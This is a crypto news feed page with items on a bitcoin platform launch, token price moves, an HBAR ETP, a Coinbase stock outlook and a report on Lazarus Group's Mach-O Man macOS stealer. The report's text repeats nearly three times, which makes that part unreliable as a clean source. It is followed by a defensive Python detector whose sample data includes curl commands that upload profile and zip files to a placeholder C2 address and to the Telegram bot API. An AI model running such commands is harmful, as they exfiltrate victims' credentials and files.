News
22 Apr 2026, 12:31
Onramp Launches New Bitcoin Finance Platform for BTC-Native Services

Onramp, the Austin-based bitcoin custody and advisory firm, launched Onramp Finance on April 21, 2026, a unified platform combining cash management, bitcoin brokerage across all 50 states, bitcoin IRAs, direct gold ownership, and a spending card into a single interface. The core question the launch raises: as institutional Bitcoin demand continues to accelerate, is the real infrastructure gap not custody or price exposure, but the fragmented financial rails surrounding long-term BTC holders?

Key Takeaways:
Platform launch: Onramp Finance went live April 21, 2026, consolidating banking, brokerage, custody, and retirement into one interface.
Yield and rewards: Cash accounts offer up to 5% rewards funded by Onramp; spending card returns up to 1.5% cash back.
Custody infrastructure: Multi-provider model spans BitGo, Coinbase, Coincover, and Tetra, with insurance through Lloyd’s of London.
Genesis Program: Capped at 210 participants; requires a minimum 2 BTC deposit and a qualifying trade of at least $100 within 30 days.
Target market: Long-term wealth builders and high-net-worth individuals treating bitcoin as a multi-decade holding, not a speculative trade.

How Onramp Finance Actually Works – and What the Architecture Signals

The platform organizes its services around three functions: earning, accumulating, and spending. Users park cash in accounts earning up to 5% in Onramp-funded rewards (discretionary, not guaranteed interest), then route funds into bitcoin or gold, with cash-back rewards from the spending card redeployable into those same asset buckets.

Custody sits on a multi-institution model spanning BitGo, Coinbase, Coincover, and Tetra, with Lloyd’s of London providing insurance coverage. That architecture eliminates single-point-of-failure risk that has historically plagued exchange-based custody, a direct structural response to the collapses that defined 2022.

“Two launches today. One lets you trade 24/7 perpetual futures on anything. One helps you earn on your cash, own bitcoin on the strongest custody architecture ever built, and preserve wealth across decades. The contrast is deafening. Speculation or savings. Pick your platform.” https://t.co/3VgY0o12d0 pic.twitter.com/4FxOyOWyTP — Michael Tanguma (@MTanguma) April 21, 2026

The Genesis Program layers early-adopter incentives on top: no-fee custody vault for one year, early product access, and direct contact with company leadership, all for a minimum 2 BTC deposit and a qualifying $100 trade within 30 days. Slots fill in trade-execution order, capped at 210 participants.

CEO Michael Tanguma framed the launch around long-horizon wealth principles rather than market timing. His position is unambiguous: “Sound financial planning has always rested on a few simple ideas. Live on less than you make. Put the rest into things that hold their value. Pass them on intelligently.” That framing matters – it signals Onramp is explicitly not competing for the active-trader segment.

The post Onramp Launches New Bitcoin Finance Platform for BTC-Native Services appeared first on Cryptonews.
22 Apr 2026, 12:14
North Korea’s Lazarus Group launches new malware kit targeting macOS users in crypto, fintech

Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s Lazarus Group has launched advanced malware targeting macOS devices. Mach-O Man, as it is called, is designed to go against crypto companies, fintech organizations, and key execs using Macs for financial transactions. The attack was first identified in the middle of April 2026. It uses popular workplace apps such as Zoom, Microsoft Teams, and Google Meet to launch social engineering attacks. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. 
Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. 
They have resulted in huge losses for the crypto world, especially those based in the United States. This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO , the $285 million theft from Drift, and $235 million from WazirX. North Korea’s Lazarus Group has launched advanced malware targeting macOS devices. Mach-O Man, as it is called, is designed to go against crypto companies, fintech organizations, and key execs using Macs for financial transactions. The attack was first identified in the middle of April 2026. It uses popular workplace apps such as Zoom, Microsoft Teams, and Google Meet to launch social engineering attacks. North Korea’s hackers go after Mac users As reported, this attack leverages the trust employees have placed in their regular communication tools, such as Zoom, Microsoft Teams, and Google Meet. This has made everyday collaboration into an avenue for system-level attacks. The first step is a carefully crafted social engineering lure through Telegram. This lures the victim – developers, executives, and decision makers in the fintech and crypto space – into an urgent meeting invite by a compromised colleague’s account. Clicking the link leads to a seemingly authentic webpage that simulates an error message when trying to connect to Zoom, Teams, or Meet. The website then asks the victim to copy and paste a seemingly harmless line of code into the Mac’s Terminal to “solve” the problem. In doing so, the victim can circumvent macOS security mechanisms, such as Gatekeeper, since the attack originates from the victim themselves. Upon execution, the code installs a binary named teamsSDK.bin. The stager downloads the fake macOS app bundle and digitally signs it with the native codesign tool using an ad hoc signature. 
It then repeatedly asks the victim for their password, displaying poorly translated messages that appear authentic. Mach-O man malware installation on fake apps. Source: AnyRun After completing the fake installation process, the stealer starts system fingerprinting, persistence configuration, and payload installation. In contrast to other techniques that involve complex exploits, this one does not. This makes it very effective on valuable targets who could be managing several simultaneous calls while copying commands without verifying them. Inside the Mach-O Man malware The “Mach-O Man” malware uses multiple stages, each with Go-compiled Mach-O binaries. The malware contains a profiler module that collects system information, including the hostname, UUID, CPU information, network configuration, and running processes It has extensions for Chrome, Firefox, Safari, Brave, Opera, and Vivaldi browsers. The information is transmitted to the command-and-control server via simple curl POST requests on ports 8888 and 9999. The persistent module minst2.bin drops a LaunchAgent plist file (com.onedrive.launcher.plist), which ensures the malware launches each time the user logs in by posing as a legitimate process called “OneDrive” or “Antivirus Service.” Macrasv2, the last payload responsible for stealing data from the system, collects information from browser login details and cookies found in SQLite databases as well as sensitive Keychain entries. All the collected data is then zipped up and sent out via the Telegram bot API, whose token was exposed on the surface. Lazarus Group’s devastating legacy in crypto and US tech The launch of “Mach-O Man” is in line with Lazarus Group’s long-term efforts to carry out cyberattacks for financial gain. They have resulted in huge losses for the crypto world, especially those based in the United States. 
This group has been identified as involved in some of the biggest thefts in crypto history, such as the $625 million theft from Ronin Network (Axie Infinity), the $1.5 billion theft from Bybit, the $308 million theft from DMM Bitcoin, the $292 million theft from KelpDAO, the $285 million theft from Drift, and $235 million from WazirX.
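Added example (not from the article or from AnyRun's report): a Python triage sketch that checks LaunchAgent plists and ps-style command lines against the indicators the Mach-O Man article names. The sample plists, paths, label, address and bot token are constructed, and the com.microsoft. label rule is an assumption of this sketch.

```python
import plistlib
from pathlib import Path
from urllib.parse import urlsplit

# Indicators named in the article above.
PLIST_NAME = "com.onedrive.launcher.plist"
STAGE_BINARIES = ("teamssdk.bin", "minst2.bin", "macrasv2")
C2_PORTS = {8888, 9999}
POST_FLAGS = ("-d", "--data", "-F", "--form")  # curl options that imply a POST


def check_launch_agent(filename, plist_bytes):
    """Return findings for one LaunchAgent plist (empty list: nothing matched)."""
    findings = []
    if filename.lower() == PLIST_NAME:
        findings.append("file name matches the reported persistence plist")
    try:
        agent = plistlib.loads(plist_bytes)
        label = str(agent.get("Label", ""))
        args = agent.get("ProgramArguments") or [agent.get("Program") or ""]
    except Exception:  # malformed file or non-dictionary root
        return findings + ["plist could not be parsed as a launchd job"]
    for arg in map(str, args):
        if any(name in arg.lower() for name in STAGE_BINARIES):
            findings.append(f"launches reported stage binary: {arg}")
    # Assumption of this sketch: genuine Microsoft agents use a com.microsoft. label.
    if "onedrive" in label.lower() and not label.lower().startswith("com.microsoft."):
        findings.append(f"OneDrive-themed label outside com.microsoft: {label}")
    return findings


def check_command_line(cmd):
    """Flag curl POSTs to the reported C2 ports or to the Telegram bot API."""
    opts = cmd.split()  # ps-style command lines carry no shell quoting
    if not opts or Path(opts[0]).name != "curl":
        return []
    is_post = any(t.startswith(POST_FLAGS) for t in opts) or bool(
        {"POST", "-XPOST"} & {t.upper() for t in opts})  # -X POST or -XPOST
    findings = []
    for tok in opts[1:]:
        if "://" not in tok:
            continue
        try:
            url = urlsplit(tok)
            port = url.port
        except ValueError:  # e.g. a non-numeric port
            continue
        if is_post and port in C2_PORTS:
            findings.append(f"curl POST to {url.hostname} port {port}")
        if url.hostname == "api.telegram.org" and url.path.startswith("/bot"):
            findings.append("curl request to the Telegram bot API")
    return findings


def scan_host():
    """Check the per-user and system LaunchAgents folders of this Mac."""
    hits = {}
    for folder in (Path.home() / "Library/LaunchAgents", Path("/Library/LaunchAgents")):
        for path in folder.glob("*.plist"):
            try:
                found = check_launch_agent(path.name, path.read_bytes())
            except OSError:  # unreadable file
                continue
            if found:
                hits[str(path)] = found
    return hits


# Constructed samples; the path, label, address and bot token are made up.
SAMPLE_BAD = plistlib.dumps({"Label": "com.onedrive.launcher", "RunAtLoad": True,
                             "ProgramArguments": ["/Users/alice/.cache/minst2.bin"]})
SAMPLE_OK = plistlib.dumps({"Label": "com.example.backup", "Program": "/usr/local/bin/backup"})
SAMPLE_CMDS = [
    "curl -s -X POST -d @/tmp/profile.json http://203.0.113.10:8888/upload",
    "curl -F document=@/tmp/out.zip https://api.telegram.org/bot0000:EXAMPLE/sendDocument",
    "curl -fsSL https://example.com/install.sh"]

if __name__ == "__main__":
    print(check_launch_agent(PLIST_NAME, SAMPLE_BAD), scan_host())
```

A match is a lead for investigation, not a verdict: the names are easy for an operator to change, so the port and Telegram checks are the more durable of the three.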
22 Apr 2026, 12:13
Can the $100K PIERVERSE Binance competition spark recovery?

PIERVERSE (PIER) has seen sharp volatility over the past few days, transitioning from a strong rally into a correction before stabilising in a recovery range. The price swings followed market reaction to earlier speculation and the launch of a new trading competition. The token initially surged from $0.429 to a peak of $1.49, before reversing sharply. It has since stabilised around $0.9311, indicating a partial recovery after the pullback, though volatility remains elevated.

Sharp rally followed by aggressive correction

The first major move in PIERVERSE came when the token climbed rapidly from $0.429 to $1.49. The rally unfolded in a short timeframe and was driven by intense speculative inflows and its listing on Upbit, one of the largest cryptocurrency exchanges in South Korea. That listing triggered a significant repricing phase, culminating in an all-time high of $1.49 on April 20, 2026. However, the move was short-lived. Once the price reached its peak, selling pressure increased sharply, leading to a near-full retracement of the advance. PIERVERSE dropped back toward the $0.69 region, effectively erasing most of the rally gains in a single corrective phase. This type of price action is typically seen when early buyers and short-term traders exit positions after a fast upward move, especially in markets where liquidity is concentrated around event-driven speculation rather than steady accumulation. Despite the steep correction, the token did not continue lower for long. Bulls gradually returned to the market, helping stabilise the price near the $0.90 region, where it currently trades around $0.926.

$100K trading competition adds a second wave of activity

Binance Wallet has launched the Pieverse Protocol Trading Competition on Binance Alpha, and during the promotion periods, users can trade PIEVERSE in their Binance Wallet (Keyless) or via Binance Alpha to receive exclusive token rewards.
Since the competition began, trading volume has remained elevated, with daily activity exceeding $115 million at press time. This level of turnover reflects strong participation from traders responding to incentives rather than passive holding behaviour. The competition has helped prevent a deeper decline after the correction, instead pushing the market into a tighter consolidation range between approximately $0.86 and $0.98. While it has not created a new breakout, it has clearly increased liquidity and reduced downward pressure in the short term.

Market behaviour shows ongoing consolidation after volatility

The current price structure suggests that PIERVERSE is still working through a post-expansion stabilisation phase. After moving from $0.429 to $1.49, and then correcting sharply, the market is now attempting to form a temporary base above the $0.90 level. Trading activity remains elevated, but direction remains uncertain. Although the $100K competition has helped maintain liquidity, it has not been enough to establish a sustained upward trend. The market is also being influenced by broader crypto conditions, particularly Bitcoin’s performance, which continues to affect liquidity flows into altcoins. In periods of Bitcoin strength, altcoins like PIERVERSE typically experience improved short-term momentum, while weakness tends to expose fragile support levels.

PIERVERSE price forecast

The key level to watch in the short term is $0.8630. This zone acts as the immediate support boundary for the current consolidation structure. As long as PIERVERSE holds above this level, the market may continue to stabilise and attempt a rebound. If support holds, the next upside targets are $0.99 and $1.08. A move through these levels would indicate improving short-term momentum and could allow the price to test $1.28, which remains a strong resistance area based on prior selling pressure.
On the downside, a clean breakdown below $0.8630 would shift focus toward $0.8456, which represents the next liquidity area where buyers may attempt to step in again. Continued weakness below that level would suggest that the post-rally correction phase is extending further.

The post Can the $100K PIERVERSE Binance competition spark recovery? appeared first on Invezz.
22 Apr 2026, 12:00
Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange

Frankfurt, Germany – In a significant development for regulated cryptocurrency access, the Valour Hedera (HBAR) Exchange Traded Product (ETP) has secured a substantial $11 million institutional investment. This capital infusion, announced by Valour, a subsidiary of DeFi Technologies, demonstrates growing institutional confidence in the Hedera network. The investment specifically targets Valour’s HBAR ETP listed on the prestigious Börse Frankfurt. Consequently, this move signals a maturing phase for digital asset investment vehicles within traditional European finance.

Valour HBAR ETP Attracts Major Institutional Capital

The $11 million investment represents a clear vote of confidence from institutional investors. Specifically, $10 million flowed directly into the “Valour Hedera (HBAR) ETP” on the Börse Frankfurt. Additionally, $1 million entered the “Valour Hedera SEK” product on Sweden’s Spotlight Exchange. Valour executed these purchases at prevailing market prices. This strategic allocation highlights targeted interest in gaining regulated exposure to the Hedera Hashgraph ecosystem. Furthermore, it underscores the pivotal role of established stock exchanges in bridging digital and traditional assets.

Exchange Traded Products provide a familiar, regulated framework for investors. They eliminate the technical complexities of direct cryptocurrency custody. Valour’s ETPs track the underlying asset’s price, offering a seamless investment experience. The Börse Frankfurt, one of Europe’s largest trading venues, provides crucial liquidity and credibility. This listing therefore validates HBAR as an institutional-grade asset within a stringent regulatory environment.

Understanding the Hedera Hashgraph Ecosystem

Hedera Hashgraph is a public distributed ledger technology. It distinguishes itself through its unique hashgraph consensus algorithm.
This system promises high throughput, low fees, and predictable network governance. The HBAR token serves as the network’s native cryptocurrency. It fuels transactions, secures the network, and enables governance participation. Major corporations, including Google, IBM, and Deutsche Telekom, govern the Hedera Council. This governance model aims to ensure stability and enterprise-grade reliability.

The network supports various decentralized applications (dApps). These span sectors like supply chain, payments, and digital identity. For instance, The Coupon Bureau uses Hedera for real-time retail coupon validation. Similarly, ServiceNow integrates Hedera for certified workflow documents. This enterprise-focused development pipeline provides fundamental utility for the HBAR token. Institutional investors likely assess this real-world adoption alongside pure market speculation.

Expert Analysis on Institutional Crypto Adoption

Financial analysts view this investment as part of a broader trend. “Institutional capital seeks regulated, transparent entry points,” notes a report from Bloomberg Intelligence. “Listed ETPs on major exchanges like Frankfurt meet this demand perfectly.” The European market has been particularly receptive to crypto ETPs. Products tracking Bitcoin and Ethereum have seen consistent inflows since 2020. The success of the Valour HBAR ETP now expands this trend to alternative layer-1 protocols.

Data from CryptoCompare shows ETP assets under management (AUM) growing steadily. European products often feature physically-backed structures. This means the issuer holds the actual cryptocurrency for each share. This structure contrasts with futures-based products common in the United States. Physical backing can reduce tracking error and counterparty risk. Consequently, it appeals to long-term, value-oriented institutional portfolios.
The Strategic Role of DeFi Technologies and Valour

Valour operates as a key subsidiary of DeFi Technologies Inc., a publicly traded company. DeFi Technologies focuses on bridging decentralized finance with traditional capital markets. The company’s strategy involves creating, managing, and offering digital asset investment products. Valour’s product suite includes ETPs for Bitcoin, Ethereum, Cardano, and now prominently, Hedera. Each product provides a simple, secure, and accessible investment pathway.

Key advantages of the Valour ETP structure include:

- Regulatory Compliance: Full adherence to EU financial regulations.
- Custody Security: Assets held with regulated, institutional-grade custodians.
- Exchange Access: Trading through conventional brokerage accounts.
- Transparent Pricing: Real-time NAV calculation and public reporting.

This infrastructure lowers the barrier to entry for pension funds, asset managers, and family offices. It transforms a digital asset into a recognizable security. The $11 million investment validates this business model’s effectiveness. It also suggests strong investor appetite for diversified crypto exposure beyond the largest two assets.

Market Impact and Future Trajectory for HBAR

The immediate market impact provides a tangible demand signal. A single $10 million purchase represents significant volume for the ETP. It directly increases the product’s assets under management. This growth enhances liquidity and tightens bid-ask spreads. Over time, sustained institutional interest can contribute to price discovery and stability for the underlying HBAR token. Moreover, it encourages other asset managers to consider similar products.

The investment timeline coincides with broader developments in the Hedera ecosystem. Recent network upgrades have improved smart contract functionality. Furthermore, stablecoin issuers are exploring the network for its low-cost settlement.
These technical and fundamental improvements create a compelling investment thesis. Institutional capital often acts on such multi-factor analyses rather than short-term momentum.

Comparative Overview of European Crypto ETP Listings

Asset | Primary Exchange | Issuer | Product Type
Bitcoin (BTC) | Börse Frankfurt, SIX | Multiple | Physically-backed ETP
Ethereum (ETH) | Börse Frankfurt, SIX | 21Shares, Valour | Physically-backed ETP
Hedera (HBAR) | Börse Frankfurt | Valour | Physically-backed ETP
Cardano (ADA) | Börse Frankfurt | Valour | Physically-backed ETP

This table illustrates Hedera’s position among other major digital assets with regulated European listings. The presence on a major exchange like Frankfurt is a key milestone. It often precedes wider adoption by larger, more conservative financial institutions.

Conclusion

The $11 million institutional investment into the Valour HBAR ETP marks a definitive step forward. It validates Hedera Hashgraph’s enterprise-focused approach within the traditional financial system. The capital deployment through the regulated framework of the Börse Frankfurt underscores a maturation in crypto investment channels. This development likely signals continued institutional exploration of alternative layer-1 blockchain assets. Ultimately, the success of the Valour HBAR ETP strengthens the bridge between innovative distributed ledger technology and the global institutional capital landscape.

FAQs

Q1: What is the Valour HBAR ETP? The Valour HBAR ETP is an Exchange Traded Product that tracks the price of Hedera’s HBAR cryptocurrency. It is listed on the Börse Frankfurt (Frankfurt Stock Exchange), allowing investors to gain exposure to HBAR through a traditional, regulated security without managing private keys.

Q2: Who made the $11 million investment? Valour, the issuer, has not disclosed the specific institutional investor(s) behind the $11 million capital inflow.
The announcement states the investment is institutional in nature, which typically refers to entities like asset managers, hedge funds, pension funds, or family offices.

Q3: How does this investment benefit HBAR? The investment increases direct demand for HBAR, as the ETP is physically backed, meaning Valour purchases and holds the underlying tokens. It also enhances the ETP’s liquidity and credibility, potentially attracting more investors and integrating HBAR deeper into the traditional financial system.

Q4: What is the difference between an ETP and buying HBAR directly? Buying the ETP involves purchasing a security on a stock exchange through a brokerage account. It offers regulatory protection, eliminates self-custody risks, and simplifies tax reporting. Buying HBAR directly requires using a cryptocurrency exchange and managing a private wallet, offering more control but also more responsibility.

Q5: Is the Valour HBAR ETP available to retail investors? Yes. While the $11 million investment was institutional, the Valour HBAR ETP is a publicly listed security. Any investor with access to a broker that supports trading on the Börse Frankfurt or Sweden’s Spotlight Exchange can purchase shares of the ETP.

This post Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange first appeared on BitcoinWorld.
22 Apr 2026, 11:45
Bybit Launches Bybit Card Welcome Campaign Offering Up to 120 USDT in Rewards for New Users and First-Time Cardholders

22 Apr 2026, 11:40
Coinbase: Don't Enter Just Yet

Summary

- Coinbase Global, Inc. still depends heavily on crypto sentiment, and I expect more short-term weakness if Bitcoin continues its post-Q4 2025 downtrend.
- Even after dropping more than 50% from its highs, COIN does not yet look cheap enough to offer the kind of asymmetric upside I want.
- The business is improving underneath that, with 12 products already above $100M in annualized revenue and subscription revenue now above 40% of net revenue.
- That is why my view is Hold: near-term downside risk still matters, but long-term optionality in stablecoins, product expansion, and diversification remains very real.

Introduction

My previous coverage on Coinbase Global Inc. (COIN) started in April of 2025, where I rated the stock a Strong Buy. Until today, Coinbase has underperformed the S&P 500 index (SPX), but in the meantime, especially until my latest writeup in June 2025, in which I issued a more cautious stance and a Hold rating, it was up around 150%. Since then, the stock has dropped almost 50% until today.

Image source: SA

Regulation has become more favorable for Coinbase, but it is not fully resolved. The company recently received conditional OCC approval for a national trust charter, which would strengthen its institutional positioning if finalized, and broader U.S. crypto regulation is moving toward more clarity. Still, today’s New York lawsuit against Coinbase Financial Markets shows that meaningful legal and regulatory friction remains.

I believe in Coinbase in the long run. It has strong product innovation upside, and exposure to crypto markets is a plus in years where crypto does well, which I am convinced we will see again in the future. In 2026, however, I do see more weakness for crypto, and even though Coinbase will ultimately reduce the share that its crypto activities take in its business, for now that is still significant and will affect Coinbase stock. Since I cannot perfectly predict timing, I am assigning a Hold rating at this point in time.
Developments

Crypto is set for lower lows in H2 2026, and Coinbase will ultimately follow. Historically, crypto performs poorly in midterm years, as does the stock market, and they are correlated. So far, crypto has followed the exact pattern of topping out in Q4 2025 (post-halving year) and dropping from there on. Price action remains within one standard deviation of the average of typical midterm year performance. Therefore, I believe it is better to listen to the signals than bluntly invest against them.

The ongoing Iran war could be (one of) the catalyst(s) to enable further weakness. The Strait of Hormuz remains disrupted. Iran might not send delegates for negotiation if the blockage persists. Trump has said he does not want to extend the ceasefire, while both Washington and Tehran have accused the other side of violating it. That does not sound like de-escalation at all, yet markets are at all-time highs, despite potential negative impacts on the economy. There are currently no interest rate cuts expected until mid-2027, which could be far too late considering recent labor market weakness.

Since crypto lacks fundamentals, technicals play an important role in valuing them. Price has been in a downtrend starting in late 2025. There was one rebound into the 50-week moving average, which got rejected and sold off significantly from there, forming lower lows around $60k. Now we are in such a rebound again, and I expect the same to occur. We might overshoot the current trading zone again, indicated by the two blue trend lines, or even tap the 50-week MA again, but after that, it seems like price will drop again. Historically, Bitcoin (BTC-USD) drops around 80% in bear markets, and even assuming some normalization, let's say a drawdown of 60%; that will bring us down to at least $50k.
Image source: TradingView

The reason why Coinbase will be affected by a weak crypto market stems from the following:

- Transaction revenues will decline as there is much less euphoria and thereby trading volume in the crypto space.
- Assets on the balance sheet will be marked down to reflect fallen crypto prices.
- This also affects other income and thereby EPS, which might turn out below analysts' estimates.
- The stock could project these results further into the future, and multiple compression may occur (that could then become a buying opportunity).

I do want to make it clear, however, that I am not a bear on COIN at all. There is significant long-term upside optionality behind this stock, and I do recognize that. It is no secret that Coinbase has continuously been expanding their product offerings, which helps reduce crypto cycle dependence. 12 of these products already produce annualized revenues of over $100M, and four of them have been launched in 2025 and another four in 2024, indicating strong innovation momentum.

Image source: COIN IR

Subscription revenues continue to trend higher and now make up over 40% of net revenues as of FY2025. This highlights COIN's ongoing diversification efforts and provides them with stickier and more predictable sales. In theory, that should make the equity more valuable because future cash flows would need to be discounted less.

Image source: COIN IR

One of the most promising business lines is stablecoins. Average USDC held in Coinbase products is at an all-time high. Coinbase makes money from USDC primarily through reserve income shared with Circle, so rising balances directly support revenue. More broadly, stablecoins are increasingly being used for payments and settlement, with Visa reporting a $3.5B annualized stablecoin settlement run rate and the overall stablecoin market now above $320B.
Image source: COIN IR

Altogether, this can help create a strong flywheel for Coinbase, where they leverage their trust, causing higher AOP and product innovation, from which they can monetize better.

Image source: COIN IR

Valuation

In my view, analysts' estimates can be largely disregarded for Coinbase, considering earnings surprise history. The combination of low trailing multiples and personal conviction for crypto and Coinbase as a business to perform well sooner rather than later is a better strategy. A long investment time horizon can work for Coinbase, but it is likely to include massive volatility swings. I would therefore rather buy during low sentiment and low multiples while having high conviction, just like in April of 2025. Despite not being historically high, COIN's P/S ratio does not reflect pessimism like in the previous cycle's midterm year, 2022. Instead, it is somewhat in between euphoric highs and depressed lows, making it neither particularly compelling to buy nor to sell here.

COIN's weekly chart is neither particularly bullish nor very bearish. We can see price bouncing off strong support around $145, which has provided a base multiple times before. Since the low in early February, it seems like price is in an uptrend, though not a very clear one. RSI is creating higher highs and lower lows, which is bullish. Since early March, however, price has struggled in the $200-$215 region, creating significant upside wicks. This is also where the 200-week exponential moving average lies, potentially indicating a long-term zone price cannot convincingly close above for now. Throughout 2024 and 2025 (Bitcoin bull market years), trading Coinbase would have worked particularly well when trading weekly breakouts, as portrayed below. That setup offered a great risk-to-reward ratio. We could be working our way to breaking out of the most recent trend line this year, so that could be an idea to keep watching.
Image source: TradingView

Conclusion

In my view, Coinbase has great next-cycle and long-term prospects. However, it is highly volatile and remains largely dependent on crypto markets, which themselves depend mostly on Bitcoin. I do see more weakness this year for Bitcoin, where one could get a better entry point into the stock, one with true asymmetrical upside. Still, selling now may be a little late. It's important to mention that this is a temporary thesis. I do think Coinbase will fare well in the long run, but I believe it could have to endure a bit more adversity this year, as opposed to many analysts who believe the bottom is already in. Since there are valid arguments for the latter as well, however, I am rating the stock a Hold instead of a Sell, so investors that already have exposure can benefit from potential near-term upside.







































